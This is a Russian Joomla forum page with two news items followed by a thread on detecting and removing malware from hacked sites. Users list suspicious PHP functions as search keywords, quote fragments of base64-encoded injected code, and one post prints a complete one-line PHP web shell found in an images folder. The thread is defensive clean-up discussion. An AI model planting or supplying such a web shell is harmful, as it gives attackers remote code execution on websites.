Новости Joomla

SW JProjects v.2.6.0 - компонент каталога расширений для Joomla

👩‍💻 SW JProjects v.2.6.0 - компонент каталога расширений для Joomla.Компонент позволяет сделать свой мини-Joomla Extensions Directory - каталог расширений для CMS (не только для Joomla) или файлов. Есть возможность скачивания по лицензионным ключам.👩‍💻 v.2.6.0. Что нового?Этот релиз прежде всего связан с SEO и AI-оптимизацией. - Микроразметка Schema.org.Добавлен плагин микроразметки Schema.org для сущностей компонента. Для списков используется ListItem, для страницы проекта и версии - SoftwareApplication, для страницы документации - TechArticle. Плагин группы schemaorg в отличие от стандартных плагинов заполняет данные автоматически, но встраивает данные в граф сущностей микроразметки Joomla. Также исправляется одна ошибка генерируемой ядром микроразметки в зоне ответственности компонента.- Улучшение поиска по ключам. В панели администратора в списке ключей теперь можно искать по номеру заказа, email, домену, содержимому примечания к ключу.- Список ключей в админке. В списке ключей в панели администратора добавлен вывод домена и примечания- Поиск в списке проектов. Поиск в списке проектов в панели администратора стал более точным. Из полей для поиска убраны лишние поля.Компонент работает на Joomla 6 без включённого плагина обратной совместимости.Страница расширения и скачатьGitHub расширения.Joomla Extensions Directory#joomla #расширения

Человек на GitHub ускорил Joomla в 600 раз на объёме 150к+ материалов в 1700+ категориях

Человек на GitHub ускорил Joomla в 600 раз на объёме 150к+ материалов в 1700+ категориях

👩‍💻 Человек на GitHub ускорил Joomla в 600 раз на объёме 150к+ материалов в 1700+ категориях. На старте его сайт на Joomla 3 вообще не смог обновиться на Joomla 5. Пришлось делать экспорт/импорт материалов. Проделав всё это он запустил-таки этот объём данных на Joomla 5. Тестовый скрипт грузил 200 материалов из этого объёма всего за 94 секунды ))) А главная страница с категориями грузилась 20 секунд. Добавив индекс для таблицы #__content

CREATE INDEX idx_catid_state ON #__content (catid, state);
он сократил время загрузки категорий до 1 секунды. Затем наш герой решил поковырять SQL-запрос в ArticleModel, который отвечает за выборку материалов. И решил заменить тип JOIN на STRAIGHT_JOIN для категорий.
// ->from($db->quoteName('#__content', 'a'))->from(    $db->quoteName('#__content', 'a')    . ' STRAIGHT_JOIN ' . $db->quoteName('#__categories', 'c')    . ' ON ' . $db->quoteName('c.id') . ' = ' . $db->quoteName('a.catid'))// ->join('LEFT', $db->quoteName('#__categories', 'c'), $db->quoteName('c.id') . ' = ' . $db->quoteName('a.catid'))
Что сократило загрузку 200 материалов из 150к с 94 секунд до 5. К слову сказать, боевой сайт на Joomla 3 крутится на 12CPU 64GB рамы. А все манипуляции с кодом он делает на базовом 1CPU 1GB сервере и замеры скорости даны именно для базового сервера. Но это всё в дискуссии, хотя в идеале должно вылиться в Pull Requests. Мы - Open Source сообщество, где никто никому ничего не должен. Джунгли. Но человек ищет пути оптимизации Joomla и предлагает решения. Если оказать поддержку и предложить помощь хотя бы с тестированием самых разнообразных сценариев, то возможно эти улучшения смогут войти в ядро. Пусть не быстро, пусть через несколько лет, пусть не все, но войдут. Достаточно предложить руку помощи и приложить немного усилий.
Дискуссию на GitHub можно почитать здесь.@joomlafeed#joomla #community #php

0 Пользователей и 1 Гость просматривают эту тему.
  • 72 Ответов
  • 39201 Просмотров
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
Но вы там не все указали )))
Цитировать
Код может быть обфусцирован, но разные eval, base64_decode, gzuncompress, gzinflate, ob_start, str_rot13 с абракадаброй тоже весьма привлекают внимание, как и вариации на тему file, fopen, readfile, file_get_contents, HttpRequest::send с чужими адресами.
источник
*

icom

  • Давно я тут
  • 830
  • 202 / 4
Скажите пожалуйста, а поиск по регулярным выражениям в Вашем скрипте есть? Если есть, то какие переменные для задания регулярных выражений?
Пока нет, но я думал про это, так как нужно искать еще строки больше определенной длины (обфусцированный код или закодированный через base64_encode обычно имеет большую длину и без пробелов), вообще скрипт пригодится и для обычной работы с сайтом, часто возникает потребность найти в коде что-то, а без скачивания сайта или отдельных папок себе на компьютер не обойтись, есть наверное фтп клиенты с поиском по содержимому файов, но они будут работать намного медленнее чем скрипт, так как скрипт использует ресурсы сервера, а  фтп клиент домашнего компьютера на котором установлен. Если кому нужно можно переделать в компонент для Joomla.

icom, спасибо за скрипт! Если Вы не против оставлю заметку у себя на сайте

Пожалуйста, я не против
*

icom

  • Давно я тут
  • 830
  • 202 / 4
Но вы там не все указали )))источник

вы правы, нужно расширить список подозрительных функций
*

altyn

  • Захожу иногда
  • 310
  • 7 / 0
  • Бог придумал смех для того чтоб над собой смеялись
Файл например может найти "eval(base64_decode("
а вот более eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlc уже не ищет, и еще добавляет слеш
а если нечего заменить просто удалить,  пробел ставить нельзя?
*

icom

  • Давно я тут
  • 830
  • 202 / 4
Цитировать
Файл например может найти "eval(base64_decode("
а вот более eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlc уже не ищет, и еще добавляет слеш
исправил

Цитировать
а если нечего заменить просто удалить,  пробел ставить нельзя?
можно, а можно и ничего не ставить, просто галку "Заменить" поставить
*

altyn

  • Захожу иногда
  • 310
  • 7 / 0
  • Бог придумал смех для того чтоб над собой смеялись
Респект и +10 icom
Вот нашел такой линк 
Цитировать
$link  = base64_decode( JRequest::getVar( 'link', '', 'post', 'base64' ) );
Это может быть вредоносным кодом ?
*

icom

  • Давно я тут
  • 830
  • 202 / 4
Код
Это может быть вредоносным кодом ?
не думаю, base64_decode сама по себе не опасна, а вот с функцией eval() да
*

MaxFarSeer

  • Захожу иногда
  • 384
  • 29 / 0
  • http://ru.ah.fm:80
Добрый вечер, спасибо за скрипт. Вопрос такой:
с помощью вашего скрипта подчистил код, поменял пароли на фтп. Искал только по строке, которая везде добавлялась:
Спойлер
[свернуть]

какие действия еще нужно провести? в теме идет речь о поиске шела и прочее, мне это не очень понятно. Иными словами, что еще нужно поискать/как поискать/логи какие то почитать? чтобы не было повторного заражения ?
Не можете найти, где редактировать код? Читаем:
Быстрый и легкий поиск нужных файлов для редактирования чего-либо

Я много времени потратил на изменение готовых шаблонов, раскуривание чего и как там у буржуев, менял код вложенный в 100500 дивов, да они неплохи эти T3 и Warp (YOO), но стоит начать делать свой шаблон...Ребята!!! Всем советую! Свое - так легко настраивать!
*

!eX

  • Новичок
  • 7
  • 0 / 0
Использую утилиту: replace.zip
В поле: Текст поиска*: пишу полностью вредоносный код с ковычками.
Вопрос: Что указывать в поле -  "Текст замены:"
*

Aleks_El_Dia

  • Живу я здесь
  • 3671
  • 353 / 0
  • AEDStudio Joomla! Direction
Использую утилиту: replace.zip
В поле: Текст поиска*: пишу полностью вредоносный код с ковычками.
Вопрос: Что указывать в поле -  "Текст замены:"
А ссылочку?
Спам придумали боги в отместку за наши молитвы (с) Рома Воронежский
На молоко: Z369038872422 || R210017695494 || U247040729215 || ЯД 410011288250383
Мигрирую сайты, переношу расширения J!1.0->J!1.5->J!2.5. Более 50 успешных миграций.
*

!eX

  • Новичок
  • 7
  • 0 / 0
Имеется ввиду, использую утилиту  http://cmsdev.org/files/replace.zip о ней сообщалось в этой ветке. Предназначена для массового удаления вредоносного кода base64_decode. Не совсем понял, что писать в поле  "Текст замены:"
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
вредоносного кода base64_decode. Не совсем понял, что писать в поле  "Текст замены:"

 base64 как и md5 просто метод кодировки decode указывает что надо раскодировать (курим мануалы)
а сам вредоносный код идет дальше DQplcnJvcl9yZXB...........

Вот чистая Joomla 1.5.25 с оф сайта
Спойлер
[свернуть]
« Последнее редактирование: 30.01.2012, 15:40:03 от oriol »
*

zicale

  • Новичок
  • 3
  • 1 / 0
Ребята, спасибо огромное.
Replace - вещь!
Fls из темы http://joomlaforum.ru/index.php/topic,198048.msg1042877.html#msg1042877 класс!
Нужно их оба использовать, с помощью первой вычистил сайт от eval base с помощью второй нашел уязвимость в компоненте "Simple Spotlight" http://extensions.joomla.org/extensions/photos-a-images/images-rotators/11876 причем такая дыра - рай для хакера, шелл залить на раз - оставили форму загрузки картинок, причем скачал с оф.сайта дистрибутив, видимо не увидели просто.
*

fedor32

  • Новичок
  • 1
  • 0 / 0
проверьте папку images, там может быть файл post.php со следующим содержанием

<?php eval(base64_decode($_POST["php"])); ?>

Стирайте нахрен, из него и растут роги. У меня он был только в одном сайте, но были поражены все, которые лежали рядом
*

angemax

  • Захожу иногда
  • 140
  • 3 / 0
А мои сайты заразили, создав отдельные папки. На одном в корне была создана папка lib, в неё залит index.php с кодом:

Спойлер
[свернуть]

В этой же папке лежал .htaccess с записью:
Спойлер
[свернуть]

В результате работы в индексе поисковиков появились страницы с ключевыми запросами на варезники. И "наштамповано" было более 1000.

Есть ли вероятность того, что простое удаление этой папки, не решает проблему?
index.php в корне проверила, ничего подозрительного не увидела
*

maratishe

  • Осваиваюсь на форуме
  • 25
  • 0 / 1
Ребята. Я так и не понял...  Что штавить в "Текст замены"
*

icom

  • Давно я тут
  • 830
  • 202 / 4
Ребята. Я так и не понял...  Что штавить в "Текст замены"
если стоит галка "Замена", то в файлах сайта "Текст поиска" будет заменен на "Текст замены", если в "Текст замены" ничего нет, то "Текст поиска" будет удален из файлов )
*

maratishe

  • Осваиваюсь на форуме
  • 25
  • 0 / 1
Ага сделал))  И сайд пос этого не работает ....
*

icom

  • Давно я тут
  • 830
  • 202 / 4
а что вы конкретно сделали? верните из бекапа
лучше скриптом не пользуйтесь, если не знаете для чего он
*

maratishe

  • Осваиваюсь на форуме
  • 25
  • 0 / 1
Ну вставлял: eval, base64_decode, gzuncompress, gzinflate, ob_start, str_rot13.........

Нашёл много..

Потом поставил галкаку  "Замена"

в "Текст замены" ничаво не писал.

И все

Потом саид не работал  ERROR line 188
*

icom

  • Давно я тут
  • 830
  • 202 / 4
eval, base64_decode, gzuncompress, gzinflate, ob_start, str_rot13 это все функции php, которые используются как в самой Joomla так и в сторонних компонентах, если вы их нашли, то это не повод их удалять), лучше обратитесь к специалистам в этом вопросе, а сайт восстановите из бекапа, если его нет, то обратитесь к хостеру чтоб восстановил
*

WebDisaster

  • Захожу иногда
  • 108
  • 12 / 0
хочу выяснить как происходит заражение (слежу 3 дня), у него 24 сайта на одном аккаунте, заражаются регулярно только три, через что мне казалось что взламывают не через фтп
Появилась идея, как взламывали? А то приехала точно такая же радость. Файлы меняли в два захода, логов за эти дни уже нет.
*

romashko1901

  • Новичок
  • 1
  • 0 / 0
чуть выше есть ответ: в папке images файл post.php спасибо :D автору за подсказку
*

WebDisaster

  • Захожу иногда
  • 108
  • 12 / 0
чуть выше есть ответ: в папке images файл post.php
Это не ответ. Ответ звучит так: файл post.php попал на сервер в результате ...
Вот многоточие как раз и интересует. Сервер я вычистил, с июля тихо. Но как это Г. мне закинули - остаётся большим вопросом.
« Последнее редактирование: 12.10.2012, 05:16:28 от WebDisaster »
*

Langoliers

  • Давно я тут
  • 621
  • 67 / 2
  • Если б Я изучал людей, то был бы паразитологом
*

WebDisaster

  • Захожу иногда
  • 108
  • 12 / 0
Было бы что читать - давно бы вычитал. Я уже объяснил:
Файлы меняли в два захода, логов за эти дни уже нет.
Шелл закинули и он около двух месяцев (если судить по дате создания файла) тихо лежал. Когда им начали пользоваться, логов на дату создания файла уже не было.
*

Rmilovidov

  • Захожу иногда
  • 110
  • 1 / 0
  • Работаю на себя
Кто за определенную плату может полечтить сайт от вируса-редиректа?
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

[Решено] Заразились в один день 4 аккаунта по 10 сайтов

Автор Stich SPb

Ответов: 356
Просмотров: 79401
Последний ответ 13.09.2019, 18:49:33
от diana1975
На мобильном не работает сайт (решено, ошибка в андройде)

Автор dragon4x4

Ответов: 5
Просмотров: 2208
Последний ответ 01.03.2018, 22:46:10
от dragon4x4
[Решено] Странный файл в Akeeba Backup - вирус?

Автор jimka

Ответов: 2
Просмотров: 1511
Последний ответ 31.05.2016, 17:39:15
от flyingspook
На сайте появилось перенаправление на нехороший сайт

Автор batot

Ответов: 5
Просмотров: 1349
Последний ответ 26.11.2015, 19:34:21
от jlend
Проверка всех файлов на изменения

Автор kik84

Ответов: 8
Просмотров: 3006
Последний ответ 17.03.2015, 13:25:47
от kik84